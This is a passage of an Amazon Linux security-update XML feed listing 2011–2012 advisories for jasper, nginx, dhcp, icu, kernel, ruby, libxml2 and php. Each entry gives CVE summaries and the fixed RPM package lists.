arch="i686"><filename>Packages/krb5-libs-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="22.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/krb5-server-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-22.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-29</id><title>Amazon Linux - ALAS-2011-29: important priority package update for jasper</title><issued date="2011-12-12 13:45:00" /><updated date="2014-09-14 15:07:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4516:
Two heap-based buffer overflow flaws were found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Two heap-based buffer overflow flaws were found in the embedded JasPer library, which is used to provide support for Part 1 of the JPEG 2000 image compression standard in the jpeg2ktopam and pamtojpeg2k tools. An attacker could create a malicious JPEG 2000 compressed image file that could cause jpeg2ktopam to crash or, potentially, execute arbitrary code with the privileges of the user running jpeg2ktopam. These flaws do not affect pamtojpeg2k.
Heap-based buffer overflow in the jpc_cox_getcompparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted numrlvls value in a JPEG2000 file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4516" title="" id="CVE-2011-4516" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1807.html" title="" id="RHSA-2011:1807" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="jasper-debuginfo" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="15.5.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/jasper-libs-1.900.1-15.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-30</id><title>Amazon Linux - ALAS-2011-30: medium priority package update for nginx</title><issued date="2011-12-13 12:50:00" /><updated date="2014-09-14 15:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4315:
Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4315" title="" id="CVE-2011-4315" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx-debuginfo" version="0.8.54" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-0.8.54-1.4.amzn1.i686.rpm</filename></package><package name="nginx" version="0.8.54" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-0.8.54-1.4.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="0.8.54" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-0.8.54-1.4.amzn1.x86_64.rpm</filename></package><package name="nginx" version="0.8.54" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-0.8.54-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-31</id><title>Amazon Linux - ALAS-2012-31: medium priority package update for dhcp</title><issued date="2012-01-05 20:58:00" /><updated date="2014-09-14 15:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4539:
dhcpd in ISC DHCP 4.x before 4.2.3-P1 and 4.1-ESV before 4.1-ESV-R4 does not properly handle regular expressions in dhcpd.conf, which allows remote attackers to cause a denial of service (daemon crash) via a crafted request packet.
A denial of service flaw was found in the way the dhcpd daemon handled DHCP request packets when regular expression matching was used in "/etc/dhcp/dhcpd.conf". A remote attacker could use this flaw to crash dhcpd.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4539" title="" id="CVE-2011-4539" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1819.html" title="" id="RHSA-2011:1819" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dhcp-devel" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="25.P1.14.amzn1" epoch="12" 
arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-32</id><title>Amazon Linux - ALAS-2012-32: medium priority package update for cacti</title><issued date="2012-01-05 20:59:00" /><updated date="2014-09-14 15:34:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cacti" version="0.8.7i" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.7i-2.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-33</id><title>Amazon Linux - ALAS-2012-33: medium priority package update for icu</title><issued date="2012-01-09 09:18:00" /><updated date="2014-09-14 15:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4599:
A stack-based buffer overflow flaw was found in the way ICU performed variant canonicalization for some locale identifiers. If a specially-crafted locale representation was opened in an application linked against ICU, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4599" title="" id="CVE-2011-4599" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1815.html" title="" id="RHSA-2011:1815" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libicu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/icu-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="libicu-devel" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-devel-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu-debuginfo" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/icu-debuginfo-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu-debuginfo" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-debuginfo-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="libicu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="libicu-doc" version="4.2.1" release="9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/libicu-doc-4.2.1-9.9.amzn1.noarch.rpm</filename></package><package name="libicu-devel" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-devel-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="icu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-4.2.1-9.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-34</id><title>Amazon Linux - ALAS-2012-34: medium priority 
package update for kernel</title><issued date="2012-01-06 10:19:00" /><updated date="2014-09-14 15:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4127:
In KVM (Kernel-based Virtual Machine) environments using raw format virtio disks backed by a partition or LVM volume, a privileged guest user could bypass intended restrictions and issue read and write requests (and other SCSI commands) on the host, and possibly access the data of other guests that reside on the same underlying block device. Partition-based and LVM-based storage pools are not used by default. Refer to Red Hat Bugzilla bug 752375 for further details and a mitigation script for users who cannot apply this update immediately.
* Using the SG_IO ioctl to issue SCSI requests to partitions or LVM volumes resulted in the requests being passed to the underlying block device. If a privileged user only had access to a single partition or LVM volume, they could use this flaw to bypass those restrictions and gain read and write access (and be able to issue other SCSI commands) to the entire block device. Refer to Red Hat Knowledgebase article DOC-67874, linked to in the References, for further details about this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4127" title="" id="CVE-2011-4127" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-106.53.amzn1.noarch.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.53.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-35</id><title>Amazon Linux - ALAS-2012-35: important priority package update for ruby</title><issued date="2012-01-19 20:02:00" /><updated date="2014-09-14 15:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4815:
Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
A denial of service flaw was found in the implementation of associative arrays (hashes) in Ruby. An attacker able to supply a large number of inputs to a Ruby application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4815" title="" id="CVE-2011-4815" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ruby" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-irb" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.357-1.10.amzn1.noarch.rpm</filename></package><package name="ruby-devel" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.357-1.10.amzn1.noarch.rpm</filename></package><package name="ruby-ri" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.357" release="1.10.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby-libs-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-36</id><title>Amazon Linux - ALAS-2012-36: important priority package update for libxml2</title><issued date="2012-01-19 20:08:00" /><updated date="2014-09-14 15:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3919:
Heap-based buffer overflow in libxml2, as used in Google Chrome before 16.0.912.75, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
A heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2011-3905:
libxml2, as used in Google Chrome before 16.0.912.63, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.
An out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3905" title="" id="CVE-2011-3905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3919" title="" id="CVE-2011-3919" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0018.html" title="" id="RHSA-2012:0018" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-devel" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package 
name="libxml2-static" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.6-4.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-37</id><title>Amazon Linux - ALAS-2012-37: medium priority package update for php</title><issued date="2012-01-19 20:10:00" /><updated date="2014-09-14 15:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4885:
PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
It was found that the hashing routine used by PHP arrays was susceptible to predictable hash collisions. If an HTTP POST request to a PHP application contained many parameters whose names map to the same hash value, a large amount of CPU time would be consumed. This flaw has been mitigated by adding a new configuration directive, max_input_vars, that limits the maximum number of parameters processed per request. By default, max_input_vars is set to 1000.
CVE-2011-4566:
Integer overflow in the exif_process_IFD_TAG function in exif.c in the exif extension in PHP 5.4.0beta2 on 32-bit platforms allows remote attackers to read the contents of arbitrary memory locations or cause a denial of service via a crafted offset_val value in an EXIF header in a JPEG file, a different vulnerability than CVE-2011-0708.
An integer overflow flaw was found in the PHP exif extension. On 32-bit systems, a specially-crafted image file could cause the PHP interpreter to crash or disclose portions of its memory when a PHP script tries to extract Exchangeable image file format (Exif) metadata from the image file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566" title="" id="CVE-2011-4566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885" title="" id="CVE-2011-4885" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0019.html" title="" id="RHSA-2012:0019" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-dba" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.9" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-fpm-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-tidy" 
version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.9" release="1.9.amzn1" epoch="0" 
